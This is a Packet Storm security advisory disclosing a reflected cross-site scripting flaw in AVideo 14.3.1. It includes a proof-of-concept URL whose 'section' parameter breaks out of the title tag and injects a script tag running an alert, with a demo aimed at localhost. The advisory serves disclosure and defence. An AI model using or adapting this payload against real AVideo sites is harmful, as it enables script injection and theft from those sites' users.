PACKETSTORM

📄 AVideo 14.3.1 Cross Site Scripting_PACKETSTORM:214469

Description

AVideo version 14.3.1 suffers from a cross site scripting vulnerability...
Visit Original Source

Basic Information

ID PACKETSTORM:214469
Published Jan 28, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : AVideo 14.3.1 XSS vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://avideo.tube/ |
=============================================================================================================================================

[+] References :

[+] Summary : AVideo version 14.3.1 suffers from a XSS vulnerability.

[+] PoC : Use Payload : ?section=login%3C/title%3E%3CScRiPt%20%3Ealert(%27indoushka%27)%3C/ScRiPt%3E

Demo : https://127.0.0.1/avideo.tube/platform/?section=login%3C/title%3E%3CScRiPt%20%3Ealert(%27indoushka%27)%3C/ScRiPt%3E


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.